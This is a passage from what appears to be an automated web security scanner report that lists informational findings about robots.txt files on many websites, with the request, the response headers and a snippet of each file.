MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:39:43 GMT
Connection: close

User-agent: *

Disallow: /ro/

26.688. http://www.mnnews.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mnnews.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mnnews.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:29 GMT
Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Thu, 29 May 2008 17:48:25 GMT
ETag: "4d40207-1b-22d52c40"
Accept-Ranges: bytes
Content-Length: 27
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /

26.689. http://www.mobilehome.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mobilehome.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mobilehome.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:13:07 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 18 Jan 2008 01:06:04 GMT
ETag: "95a9ee-280-443f4bf18d700"
Accept-Ranges: bytes
Content-Length: 640
Vary: Accept-Encoding
P3P: CP="NOI DSP COR NID"
Connection: close
Content-Type: text/plain
Set-Cookie: SERVERID=B; path=/

User-agent: *
Disallow: /cgi-bin/
Disallow: /classes/
Disallow: /old/
Disallow: /ad/
Disallow: /graphics/
Disallow: /jimages/
Disallow: /tabset/
Disallow: /mhpx/
Disallow: /pictures/
Disallow: /sub-he
...[SNIP]...

26.690. http://www.modelaircraft.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.modelaircraft.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.modelaircraft.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 18 Nov 2008 22:03:42 GMT
Accept-Ranges: bytes
ETag: "0b3ad84c949c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Tue, 03 May 2011 11:23:57 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

26.691. http://www.modelhour.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.modelhour.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.modelhour.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 07 Oct 2009 11:09:46 GMT
Accept-Ranges: bytes
ETag: "f18eb1ad3e47ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:27:39 GMT
Connection: close
Content-Length: 27

User-agent: *
Allow: /

26.692. http://www.modernmom.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.modernmom.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.modernmom.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Mon, 02 May 2011 03:39:33 GMT
ETag: "a5cea8-624-4a242c5910740"
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 23:14:36 GMT
Vary: Accept-Encoding
Content-Type: text/plain
Content-Length: 1572
Date: Tue, 03 May 2011 10:28:56 GMT
X-Varnish: 1085370413 1085322158
Age: 40460
Via: 1.1 varnish
Connection: close

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.693. http://www.moneyfactory.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moneyfactory.gov
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.moneyfactory.gov

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:44 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 28 Apr 2011 22:16:59 GMT
ETag: "36c317b-19-4a201ea781b4e"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.694. http://www.monica.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.monica.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.monica.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:43 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 13 Oct 2010 15:49:28 GMT
ETag: "3858b5-a08-4928189d95200"
Accept-Ranges: bytes
Content-Length: 2568
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:39:43 GMT
P3P: CP=HONK
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.695. http://www.monroecc.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.monroecc.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.monroecc.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /phplive/
Disallow: /emergency/
Disallow: /emergency2/
Disallow: /includes/
Disallow: /htdig/
Disallow: /newsletters/
Disallow: /communities/
Disal
...[SNIP]...

26.696. http://www.montanalottery.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.montanalottery.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.montanalottery.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:11:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 17 Mar 2011 20:44:00 GMT
ETag: "1f75ce-42d-49eb3b895c400"
Accept-Ranges: bytes
Content-Length: 1069
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /modules/cronJobs
Disallow: /modules/email
Disallow: /modules/playersClub
Disallow: /modules/xml
User-agent: Googlebot-Image
Disallow: /images
User-agent: Sogou web spider
Disa
...[SNIP]...

26.697. http://www.monticello.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.monticello.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.monticello.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:50 GMT
Server: Apache
Last-Modified: Wed, 10 Dec 2008 20:12:19 GMT
ETag: "4fd830b-636-45db6e083aec0"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:05:50 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.698. http://www.motivano.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.motivano.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.motivano.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Last-Modified: Tue, 12 Oct 2010 16:53:53 GMT
Accept-Ranges: bytes
ETag: "40aa8cd2e6acb1:fdc"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:16:57 GMT
Connection: close

...User-agent: *
Allow: /

26.699. http://www.motorracingnetwork.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.motorracingnetwork.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.motorracingnetwork.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 18 Dec 2010 16:20:13 GMT
Accept-Ranges: bytes
ETag: "d6d83773cf9ecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 158
Cache-Control: max-age=604758
Date: Tue, 03 May 2011 10:16:22 GMT
Connection: close

# Robots TXT for all Sites
User-agent: * # allow all bots
Disallow: # nothing is blocked at this time
Crawl-delay: 30 # lets hold their toes for 30 seconds

26.700. http://www.mountwashington.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mountwashington.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mountwashington.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:08:25 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 21:21:39 GMT
ETag: "19401c-d7-4c3f7be3"
Accept-Ranges: bytes
Content-Length: 215
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /404.php
Disallow: /search/
Disallow: /images/
Disallow: /goto/
Disallow: /transcripts/
Disallow: /fundraising/view.php
Disallow: /about/membership/join.php
Disallow: /mobile/

...[SNIP]...

26.701. http://www.moveforfree.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moveforfree.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.moveforfree.com

Response

HTTP/1.1 200 OK
Content-Length: 293
Content-Type: text/plain
Last-Modified: Sun, 22 May 2005 01:48:42 GMT
Accept-Ranges: bytes
ETag: "079cb61705ec51:1ad5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:04:54 GMT
Connection: close

#
# Welcome to Moveforfree.com robots.txt
#

User-agent: Mozilla/4.0 (compatible; grub-client-1.0.5; Crawl your own stuff with http://grub.org)
Disallow: /

User-agent: grub-client-1.0.5
Disa
...[SNIP]...

26.702. http://www.movieretriever.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.movieretriever.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.movieretriever.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:06:56 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8a
Last-Modified: Wed, 07 Apr 2010 06:45:58 GMT
ETag: "2634-5ca-4839fea225580"
Accept-Ranges: bytes
Content-Length: 1482
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServervideohound=2282791434.24098.0000; path=/

# $Id: robots.txt,v 1.4 2008-02-12 15:44:26 vvenugop Exp $
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://w
...[SNIP]...

26.703. http://www.mpt.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mpt.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mpt.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:59 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.15 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Tue, 27 Oct 2009 18:41:02 GMT
ETag: "18262ed-66d-476ef051eab80"
Accept-Ranges: bytes
Content-Length: 1645
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9 2007/06/27 22:37:44 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites lik
...[SNIP]...

26.704. http://www.mscd.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mscd.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mscd.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:49:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 03 Oct 2007 17:03:40 GMT
ETag: "2230874-35-43b99a6b8b300"
Accept-Ranges: bytes
Content-Length: 53
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/

26.705. http://www.msha.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msha.gov
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.msha.gov

Response

HTTP/1.1 200 OK
Content-Length: 563
Content-Type: text/plain
Last-Modified: Tue, 29 Sep 2009 13:55:36 GMT
Accept-Ranges: bytes
ETag: "6e2bff84c41ca1:1d1f"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:41:48 GMT
Connection: close

User-agent: archive.org_bot
Disallow:/cgi-bin
Disallow:/drs/asp
Disallow:/mshamfg/
Disallow:/indexes
Disallow:/Bill
Disallow:/Private
Disallow:/Sendmail
Disallow:/Spanish
Disallow:/Exit

...[SNIP]...

26.706. http://www.mshsl.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mshsl.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mshsl.org

Response

HTTP/1.1 200 OK
Content-Length: 413
Content-Type: text/plain
Last-Modified: Fri, 10 Dec 2010 19:31:10 GMT
Accept-Ranges: bytes
ETag: "fe2685cca098cb1:2dc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:47:02 GMT
Connection: close

User-agent: *
Disallow: /mshsl/schoolactpage.asp
Disallow: /mshsl/showgameinfo.asp
Disallow: /mshsl/schedule.asp
Disallow: /mshsl/showroster.asp
Disallow: /mshsl/administration/
Disallow: /mshsl
...[SNIP]...

26.707. http://www.mtsac.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mtsac.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mtsac.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:13 GMT
Server: Apache
Last-Modified: Mon, 29 Nov 2010 22:56:38 GMT
ETag: "101c003-79-fc0eb580"
Accept-Ranges: bytes
Content-Length: 121
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/calendar
Allow: /
Disallow: /gallery
Disallow: /administration/senates/academic/access

26.708. http://www.mtv.ca/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mtv.ca
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mtv.ca

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Fri, 27 Apr 2007 18:19:47 GMT
ETag: "55a5343-32-42f1c2e2af6c0"
Accept-Ranges: bytes
Content-Length: 50
Content-Type: text/plain
Cache-Control: max-age=1800
Date: Tue, 03 May 2011 10:22:27 GMT
Connection: close

User-agent: Googlebot
Disallow: /broadband_mac/

26.709. http://www.musclepricecars.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.musclepricecars.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.musclepricecars.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:11:42 GMT
Server: Apache/1.3.34 (Unix) filter/1.0 PHP/4.4.4
Last-Modified: Fri, 30 Apr 2010 04:25:43 GMT
ETag: "bce4bc-1b-4bda5bc7"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

26.710. http://www.muskingum.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.muskingum.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.muskingum.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:14 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 18 Feb 2011 17:25:42 GMT
ETag: "3118004-107-49c91cdb19180"
Accept-Ranges: none
Content-Length: 263
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cgi-bin/
Disallow: /manual/
Disallow: /usage
Disallow: /icons/
Disallow: /error/
Disallow: /perl/
Disallow: /piwik/
Disallow: /gcount/
Disallow: /Templates
Disallow: /Template
...[SNIP]...

26.711. http://www.mustangevolution.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mustangevolution.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mustangevolution.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:58:41 GMT
Server: Apache
Last-Modified: Sat, 23 Apr 2011 22:02:38 GMT
Accept-Ranges: bytes
Content-Length: 2554
Vary: Accept-Encoding
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain; charset=UTF-8

# Allow Archiver
User-agent: ia_archiver
Allow: /

User-agent: BoardTracker
Disallow: /

User-agent: BoardReader
Disallow: /

# Root Folders
User-agent: *
Disallow: /videos/
Disallow: /pages/
Disallow
...[SNIP]...

26.712. http://www.mutualofamerica.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mutualofamerica.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mutualofamerica.com

Response

HTTP/1.1 200 OK
Content-Length: 217
Content-Type: text/plain
Last-Modified: Tue, 30 Nov 2010 20:01:38 GMT
Accept-Ranges: bytes
ETag: "07dbe65c990cb1:41b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:18:22 GMT
Connection: close

#
# robots.txt for http://wwww.mutualofamerica.com/
#
# exclude some access-controlled areas
User-agent: *
Disallow: /common
Disallow: /dts
Disallow: /include
Disallow: /Articles-OLD
Disallow
...[SNIP]...

26.713. http://www.mychances.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mychances.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mychances.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:09:10 GMT
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 23 Apr 2009 22:57:26 GMT
ETag: "e4140-17-46840cdc0c180"
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.714. http://www.mycraftcoupons.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mycraftcoupons.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mycraftcoupons.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Tue, 03 May 2011 21:34:32 GMT
Date: Mon, 02 May 2011 21:34:32 GMT
Last-Modified: Sun, 01 May 2011 23:12:32 GMT
ETag: "9f6d9be4-d7bc-433d-a38d-fea5dd3eaae8"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400, must-revalidate, proxy-revalidate
Age: 48504

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search
Disallow: /related-content.g
Disallow: /related_content_helper.html

Sitemap: http://www.mycraftcoupons.com/feeds/posts/def
...[SNIP]...

26.715. http://www.mycurves.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mycurves.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mycurves.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:33 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.153391304418393594; path=/
Last-Modified: Wed, 29 Mar 2006 23:46:16 GMT
ETag: "50deb-20-442b1c48"
Accept-Ranges: bytes
Content-Length: 32
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/

26.716. http://www.myefficientplanet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myefficientplanet.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myefficientplanet.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:52 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 13 Mar 2011 01:26:18 GMT
ETag: "1203fe2-37a-49e5314f64280"
Accept-Ranges: bytes
Content-Length: 890
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes
Disallow: /feed
Disallow: /*
...[SNIP]...

26.717. http://www.myezdeal.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myezdeal.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myezdeal.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:53:23 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "210629f-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

26.718. http://www.myfamilytalk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myfamilytalk.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myfamilytalk.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 26 Jan 2011 17:13:05 GMT
Accept-Ranges: bytes
ETag: "3c96a34b7cbdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:40:41 GMT
Connection: close
Content-Length: 3393

user-agent: *

Disallow: About/About/James-Dobson.aspx
Disallow:/Broadcasts/\images\broadcasts\RonBlue1.jpg
Disallow:/Broadcasts/About/James-Dobson.aspx
Disallow:/Broadcasts/Contact.aspx
Disallo
...[SNIP]...

26.719. http://www.myfreecreditscore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myfreecreditscore.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myfreecreditscore.com

Response

HTTP/1.1 200 OK
Content-Length: 41
Content-Type: text/plain
Last-Modified: Thu, 10 Jun 2010 20:04:25 GMT
Accept-Ranges: bytes
ETag: "6c4bf31fd88cb1:f879"
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:30:31 GMT
Connection: close

User-agent: *
Disallow: /WebResource.axd

26.720. http://www.myfreedegree.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myfreedegree.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myfreedegree.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 11:08:07 GMT
Server: Apache/2.2.11 (Fedora)
Last-Modified: Tue, 06 May 2008 21:20:43 GMT
ETag: "182be6-22-44c966bba00c0"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Fasterfox
Disallow: /

26.721. http://www.myhealthycat.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myhealthycat.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myhealthycat.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:31 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.myhealthycat.com/My1DOlxQ.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/
Di
...[SNIP]...

26.722. http://www.myip.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myip.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myip.org

Response

HTTP/1.1 200 OK
Content-Length: 36
Content-Type: text/plain
Last-Modified: Fri, 31 Mar 2006 00:23:31 GMT
Accept-Ranges: bytes
ETag: "b01e4565954c61:18d9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:40:07 GMT
Connection: close

User-agent: *
Disallow: /errors.htm

26.723. http://www.mylovedanal.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mylovedanal.tv
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylovedanal.tv

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Tue, 03 May 2011 10:22:44 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 28 Nov 2008 05:51:25 GMT
ETag: "4f8020-50-492f86dd"
Accept-Ranges: bytes
Content-Length: 80

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.mylovedanal.tv/sitemap.xml

26.724. http://www.mylovedasses.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mylovedasses.tv
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylovedasses.tv

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Tue, 03 May 2011 11:18:44 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 21 Oct 2008 09:18:27 GMT
ETag: "c225ba-51-48fd9e63"
Accept-Ranges: bytes
Content-Length: 81

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.mylovedasses.tv/sitemap.xml

26.725. http://www.mylovedrubber.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mylovedrubber.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylovedrubber.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Tue, 03 May 2011 11:40:12 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 20 Nov 2009 12:44:39 GMT
ETag: "1cd00a7-53-4b068f37"
Accept-Ranges: bytes
Content-Length: 83

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.mylovedrubber.com/sitemap.xml

26.726. http://www.myrtlebeach.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myrtlebeach.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myrtlebeach.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:27:44 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 14:43:39 GMT
ETag: "69d20-5b-49f2762f608a4"
Accept-Ranges: bytes
Content-Length: 91
Keep-Alive: timeout=2, max=150
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.myrtlebeach.com/site/xml_sitemaps/

Disallow: /clicks/

26.727. http://www.mysubtitles.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mysubtitles.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mysubtitles.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:41:22 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 27
Last-Modified: Thu, 24 Apr 2008 03:50:00 GMT
Connection: close
Accept-Ranges: bytes

User-Agent: *
Allow: /

26.728. http://www.mytones.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mytones.us
